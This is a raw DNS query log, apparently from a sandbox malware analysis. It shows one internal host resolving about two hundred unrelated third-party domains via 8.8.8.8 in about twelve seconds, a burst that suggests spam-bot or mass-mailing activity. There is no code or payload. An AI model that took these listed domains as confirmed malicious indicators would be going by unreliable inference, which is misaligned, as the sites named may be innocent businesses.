Mar 22, 2023 05:45:21.020663023 CET	192.168.2.5	8.8.8.8	0x6ab7	Standard query (0)	oaith.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.051409006 CET	192.168.2.5	8.8.8.8	0xd366	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.067734957 CET	192.168.2.5	8.8.8.8	0x54c7	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.114573956 CET	192.168.2.5	8.8.8.8	0x5e93	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.114804983 CET	192.168.2.5	8.8.8.8	0x5112	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.160096884 CET	192.168.2.5	8.8.8.8	0xaf95	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.218784094 CET	192.168.2.5	8.8.8.8	0xfb5d	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.259267092 CET	192.168.2.5	8.8.8.8	0xd679	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.297811985 CET	192.168.2.5	8.8.8.8	0x5a13	Standard query (0)	deckoviny.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.375766039 CET	192.168.2.5	8.8.8.8	0xac50	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.765923023 CET	192.168.2.5	8.8.8.8	0x56d1	Standard query (0)	stopllc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.769687891 CET	192.168.2.5	8.8.8.8	0xfe6d	Standard query (0)	absblast.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.806546926 CET	192.168.2.5	8.8.8.8	0x11d3	Standard query (0)	midap.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.904906034 CET	192.168.2.5	8.8.8.8	0x92dc	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.938745022 CET	192.168.2.5	8.8.8.8	0x4834	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.948216915 CET	192.168.2.5	8.8.8.8	0x778d	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.013767004 CET	192.168.2.5	8.8.8.8	0x139f	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.014314890 CET	192.168.2.5	8.8.8.8	0x9b41	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.016737938 CET	192.168.2.5	8.8.8.8	0x1430	Standard query (0)	x96.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.063397884 CET	192.168.2.5	8.8.8.8	0xdce2	Standard query (0)	enguita.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.063991070 CET	192.168.2.5	8.8.8.8	0x8f54	Standard query (0)	shteeble.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.064207077 CET	192.168.2.5	8.8.8.8	0xb490	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.064827919 CET	192.168.2.5	8.8.8.8	0x286b	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.156816006 CET	192.168.2.5	8.8.8.8	0x52a0	Standard query (0)	jabian.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.406543970 CET	192.168.2.5	8.8.8.8	0x27c7	Standard query (0)	tabbles.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.413099051 CET	192.168.2.5	8.8.8.8	0x8293	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.447470903 CET	192.168.2.5	8.8.8.8	0x8072	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.487790108 CET	192.168.2.5	8.8.8.8	0x4063	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.500468969 CET	192.168.2.5	8.8.8.8	0x51dc	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.590236902 CET	192.168.2.5	8.8.8.8	0x9858	Standard query (0)	thiessen.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.651253939 CET	192.168.2.5	8.8.8.8	0x662b	Standard query (0)	bigzz.by	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.678878069 CET	192.168.2.5	8.8.8.8	0x3662	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.885628939 CET	192.168.2.5	8.8.8.8	0x840f	Standard query (0)	bggs.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.098454952 CET	192.168.2.5	8.8.8.8	0xd017	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.136622906 CET	192.168.2.5	8.8.8.8	0xf309	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.172244072 CET	192.168.2.5	8.8.8.8	0xe148	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.172777891 CET	192.168.2.5	8.8.8.8	0x9aab	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.203115940 CET	192.168.2.5	8.8.8.8	0x543	Standard query (0)	nrsi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.359173059 CET	192.168.2.5	8.8.8.8	0x3858	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.382709980 CET	192.168.2.5	8.8.8.8	0x45aa	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.437388897 CET	192.168.2.5	8.8.8.8	0xa30f	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.437388897 CET	192.168.2.5	8.8.8.8	0x288d	Standard query (0)	kevyt.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.515939951 CET	192.168.2.5	8.8.8.8	0x2e83	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.523279905 CET	192.168.2.5	8.8.8.8	0x8e4a	Standard query (0)	603888.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.540556908 CET	192.168.2.5	8.8.8.8	0x8f36	Standard query (0)	xult.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.542875051 CET	192.168.2.5	8.8.8.8	0xb416	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.561741114 CET	192.168.2.5	8.8.8.8	0xb593	Standard query (0)	doggybag.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.568166018 CET	192.168.2.5	8.8.8.8	0xc7d6	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.631530046 CET	192.168.2.5	8.8.8.8	0x8870	Standard query (0)	gydrozo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.631530046 CET	192.168.2.5	8.8.8.8	0x3ce	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.692271948 CET	192.168.2.5	8.8.8.8	0x442f	Standard query (0)	nekono.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.723763943 CET	192.168.2.5	8.8.8.8	0xeb14	Standard query (0)	komie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.800580978 CET	192.168.2.5	8.8.8.8	0x52f1	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.859081030 CET	192.168.2.5	8.8.8.8	0x647c	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.874385118 CET	192.168.2.5	8.8.8.8	0x1593	Standard query (0)	nme.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.923975945 CET	192.168.2.5	8.8.8.8	0x9fe3	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.018030882 CET	192.168.2.5	8.8.8.8	0x8dcb	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.062563896 CET	192.168.2.5	8.8.8.8	0x10e0	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.265898943 CET	192.168.2.5	8.8.8.8	0xad18	Standard query (0)	noblesse.be	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.353596926 CET	192.168.2.5	8.8.8.8	0xc5a0	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.371340036 CET	192.168.2.5	8.8.8.8	0xac5a	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.372832060 CET	192.168.2.5	8.8.8.8	0x5e45	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.389313936 CET	192.168.2.5	8.8.8.8	0xee39	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.389708042 CET	192.168.2.5	8.8.8.8	0xe110	Standard query (0)	mail.protonmail.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.422050953 CET	192.168.2.5	8.8.8.8	0x5822	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.423774004 CET	192.168.2.5	8.8.8.8	0x952d	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.426034927 CET	192.168.2.5	8.8.8.8	0x4ee4	Standard query (0)	bidroll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.477456093 CET	192.168.2.5	8.8.8.8	0x2af4	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.525604010 CET	192.168.2.5	8.8.8.8	0x9168	Standard query (0)	enguita.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.719353914 CET	192.168.2.5	8.8.8.8	0x39a0	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.743448019 CET	192.168.2.5	8.8.8.8	0x7c31	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.748545885 CET	192.168.2.5	8.8.8.8	0x80f	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.802999973 CET	192.168.2.5	8.8.8.8	0x454e	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.813236952 CET	192.168.2.5	8.8.8.8	0xda73	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.813678980 CET	192.168.2.5	8.8.8.8	0x174f	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.919684887 CET	192.168.2.5	8.8.8.8	0xaefc	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.955496073 CET	192.168.2.5	8.8.8.8	0x58a4	Standard query (0)	gcss.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.093800068 CET	192.168.2.5	8.8.8.8	0x6b7a	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.190840960 CET	192.168.2.5	8.8.8.8	0x25c	Standard query (0)	xsui.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.254533052 CET	192.168.2.5	8.8.8.8	0x53a0	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.270889044 CET	192.168.2.5	8.8.8.8	0x14f4	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.282742977 CET	192.168.2.5	8.8.8.8	0x8eac	Standard query (0)	alexpope.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.300271034 CET	192.168.2.5	8.8.8.8	0xf762	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.354120016 CET	192.168.2.5	8.8.8.8	0x3a5d	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.439800978 CET	192.168.2.5	8.8.8.8	0x3b8e	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.568646908 CET	192.168.2.5	8.8.8.8	0xed06	Standard query (0)	adeesa.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.625428915 CET	192.168.2.5	8.8.8.8	0x8f08	Standard query (0)	skgm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.625428915 CET	192.168.2.5	8.8.8.8	0x3326	Standard query (0)	araax.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.717489004 CET	192.168.2.5	8.8.8.8	0x80f	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.750129938 CET	192.168.2.5	8.8.8.8	0x9f72	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.762759924 CET	192.168.2.5	8.8.8.8	0xd5de	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.878674984 CET	192.168.2.5	8.8.8.8	0x54ba	Standard query (0)	univi.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.140619993 CET	192.168.2.5	8.8.8.8	0xbfd2	Standard query (0)	shteeble.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.146681070 CET	192.168.2.5	8.8.8.8	0x3720	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.208677053 CET	192.168.2.5	8.8.8.8	0x2943	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.280723095 CET	192.168.2.5	8.8.8.8	0x5430	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.307698011 CET	192.168.2.5	8.8.8.8	0x71b6	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.484623909 CET	192.168.2.5	8.8.8.8	0x3556	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.516520977 CET	192.168.2.5	8.8.8.8	0x4811	Standard query (0)	sidepath.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.616806984 CET	192.168.2.5	8.8.8.8	0x7993	Standard query (0)	tbvlugus.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.687045097 CET	192.168.2.5	8.8.8.8	0xccab	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.687328100 CET	192.168.2.5	8.8.8.8	0x4855	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.703803062 CET	192.168.2.5	8.8.8.8	0xdb21	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.778177977 CET	192.168.2.5	8.8.8.8	0xfc1f	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.890749931 CET	192.168.2.5	8.8.8.8	0x7362	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.988365889 CET	192.168.2.5	8.8.8.8	0xc43	Standard query (0)	smitko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.015652895 CET	192.168.2.5	8.8.8.8	0x52ff	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.016685009 CET	192.168.2.5	8.8.8.8	0xb37f	Standard query (0)	bggs.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.171561956 CET	192.168.2.5	8.8.8.8	0x566	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.265353918 CET	192.168.2.5	8.8.8.8	0x48cf	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.516279936 CET	192.168.2.5	8.8.8.8	0xa2b2	Standard query (0)	listel.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.516546965 CET	192.168.2.5	8.8.8.8	0xeec6	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.656393051 CET	192.168.2.5	8.8.8.8	0x142c	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.671108007 CET	192.168.2.5	8.8.8.8	0xdb21	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.722481012 CET	192.168.2.5	8.8.8.8	0xce8c	Standard query (0)	touchfam.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.738179922 CET	192.168.2.5	8.8.8.8	0xb9b4	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.013290882 CET	192.168.2.5	8.8.8.8	0x839	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.200007915 CET	192.168.2.5	8.8.8.8	0xaa5d	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.205497980 CET	192.168.2.5	8.8.8.8	0xcbe8	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.243381977 CET	192.168.2.5	8.8.8.8	0x870f	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.382441998 CET	192.168.2.5	8.8.8.8	0x5de2	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.710516930 CET	192.168.2.5	8.8.8.8	0xc775	Standard query (0)	sledsport.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.731636047 CET	192.168.2.5	8.8.8.8	0xdb21	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.766582966 CET	192.168.2.5	8.8.8.8	0x7b8a	Standard query (0)	www.fnsds.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.278395891 CET	192.168.2.5	8.8.8.8	0x277b	Standard query (0)	fdlymca.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.288058043 CET	192.168.2.5	8.8.8.8	0x46d	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.326174021 CET	192.168.2.5	8.8.8.8	0xd2b5	Standard query (0)	www.tyrns.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.333400965 CET	192.168.2.5	8.8.8.8	0xa72b	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.341223001 CET	192.168.2.5	8.8.8.8	0x12ad	Standard query (0)	captlfix.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.454562902 CET	192.168.2.5	8.8.8.8	0x3d5	Standard query (0)	mail.protonmail.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.458477020 CET	192.168.2.5	8.8.8.8	0xf849	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.591609955 CET	192.168.2.5	8.8.8.8	0x50f0	Standard query (0)	bossinst.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.758093119 CET	192.168.2.5	8.8.8.8	0x94a3	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.760162115 CET	192.168.2.5	8.8.8.8	0x5ac4	Standard query (0)	www.pohlfood.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:30.910578012 CET	192.168.2.5	8.8.8.8	0xf55f	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:30.965323925 CET	192.168.2.5	8.8.8.8	0x225b	Standard query (0)	cbaben.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:30.994390965 CET	192.168.2.5	8.8.8.8	0x87f8	Standard query (0)	e-kami.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.022804022 CET	192.168.2.5	8.8.8.8	0x4083	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.036637068 CET	192.168.2.5	8.8.8.8	0xdb21	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.066221952 CET	192.168.2.5	8.8.8.8	0x3f44	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.067264080 CET	192.168.2.5	8.8.8.8	0x9e40	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.075107098 CET	192.168.2.5	8.8.8.8	0xae74	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.178210020 CET	192.168.2.5	8.8.8.8	0x1a96	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.259516954 CET	192.168.2.5	8.8.8.8	0x6aed	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.271723032 CET	192.168.2.5	8.8.8.8	0x485f	Standard query (0)	enguita.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.273811102 CET	192.168.2.5	8.8.8.8	0x9aeb	Standard query (0)	www.spanesi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.275762081 CET	192.168.2.5	8.8.8.8	0x6860	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.276577950 CET	192.168.2.5	8.8.8.8	0x6db3	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.278413057 CET	192.168.2.5	8.8.8.8	0x7b7d	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.287045002 CET	192.168.2.5	8.8.8.8	0x2292	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.293850899 CET	192.168.2.5	8.8.8.8	0xf54	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.295104027 CET	192.168.2.5	8.8.8.8	0x539	Standard query (0)	ssm.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.296088934 CET	192.168.2.5	8.8.8.8	0xf1ab	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.298424006 CET	192.168.2.5	8.8.8.8	0x5e43	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.300254107 CET	192.168.2.5	8.8.8.8	0x8709	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.303433895 CET	192.168.2.5	8.8.8.8	0xeba0	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.316529989 CET	192.168.2.5	8.8.8.8	0xc358	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.339667082 CET	192.168.2.5	8.8.8.8	0x9c2	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.348845959 CET	192.168.2.5	8.8.8.8	0xaf54	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.404778957 CET	192.168.2.5	8.8.8.8	0x276d	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.412669897 CET	192.168.2.5	8.8.8.8	0x21fe	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.415796041 CET	192.168.2.5	8.8.8.8	0x56aa	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.442488909 CET	192.168.2.5	8.8.8.8	0xd1f3	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.445486069 CET	192.168.2.5	8.8.8.8	0x43ad	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.484653950 CET	192.168.2.5	8.8.8.8	0xc4ef	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.496603012 CET	192.168.2.5	8.8.8.8	0xb193	Standard query (0)	www.tc17.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.498769045 CET	192.168.2.5	8.8.8.8	0x248	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.535450935 CET	192.168.2.5	8.8.8.8	0x1385	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.541063070 CET	192.168.2.5	8.8.8.8	0x79b9	Standard query (0)	kairel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.545897007 CET	192.168.2.5	8.8.8.8	0xa110	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.548960924 CET	192.168.2.5	8.8.8.8	0xda69	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.571222067 CET	192.168.2.5	8.8.8.8	0xa403	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.719291925 CET	192.168.2.5	8.8.8.8	0xcbe9	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.727003098 CET	192.168.2.5	8.8.8.8	0x2500	Standard query (0)	midap.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.813421011 CET	192.168.2.5	8.8.8.8	0x558f	Standard query (0)	icd-host.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.885951996 CET	192.168.2.5	8.8.8.8	0x5f18	Standard query (0)	likangds.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.907337904 CET	192.168.2.5	8.8.8.8	0xbce	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:31.973202944 CET	192.168.2.5	8.8.8.8	0xea8f	Standard query (0)	mondopp.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.004313946 CET	192.168.2.5	8.8.8.8	0x967f	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.056097984 CET	192.168.2.5	8.8.8.8	0x3cd9	Standard query (0)	www.11tochi.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.205662012 CET	192.168.2.5	8.8.8.8	0x124c	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.207591057 CET	192.168.2.5	8.8.8.8	0x8e74	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.229166985 CET	192.168.2.5	8.8.8.8	0x3f22	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.264863968 CET	192.168.2.5	8.8.8.8	0x6860	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.281296968 CET	192.168.2.5	8.8.8.8	0xe3d5	Standard query (0)	yasuma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.298712015 CET	192.168.2.5	8.8.8.8	0x1827	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.312288046 CET	192.168.2.5	8.8.8.8	0x7b7d	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.420942068 CET	192.168.2.5	8.8.8.8	0x43ad	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.450541973 CET	192.168.2.5	8.8.8.8	0xdacc	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.455977917 CET	192.168.2.5	8.8.8.8	0x798f	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.629508972 CET	192.168.2.5	8.8.8.8	0x539	Standard query (0)	avse.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.749943018 CET	192.168.2.5	8.8.8.8	0xf0f8	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:32.894756079 CET	192.168.2.5	8.8.8.8	0x967	Standard query (0)	angework.com	A (IP address)	IN (0x0001)	false
